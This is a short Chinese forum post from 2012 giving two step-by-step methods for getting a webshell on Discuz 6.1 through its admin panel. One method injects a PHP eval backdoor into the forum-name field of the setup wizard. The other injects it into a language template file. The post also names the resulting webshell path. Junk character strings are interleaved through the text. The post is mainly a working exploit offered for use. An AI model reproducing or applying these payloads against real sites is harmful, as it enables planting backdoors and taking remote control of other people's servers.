discuz6.1两种方法后台拿shell
! r* g/ f( E% a& d好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
% b# X* W* L+ F& q1: {8 G. J" f4 \
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
8 S3 P( N2 p& y* madmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell' d9 Y# W' c0 e/ d
<?php eval($_POST[cmd]);?>
3 E/ Y" h9 a4 y; Z# f' X- x# Y9 t后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
( U! a6 }# a4 K4 {5 v+ a
8 Y9 x# Z; r7 h* l$ P# g8 C, v/ V- V2 R/ Y) B* z8 ?$ P) ?( o
2:后台模板管理--默认模板套系--详情
1 s" S4 N0 _4 c T6 Ptemplates/default/actions.lang.php8 \. V4 ?: \3 N
jhackj\\');eval($_POST[cmd])?>;//
- V, v: d! ]7 t! o+ G$ @" p6 X) B$ o, d# M/ I9 r) {" \+ I
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对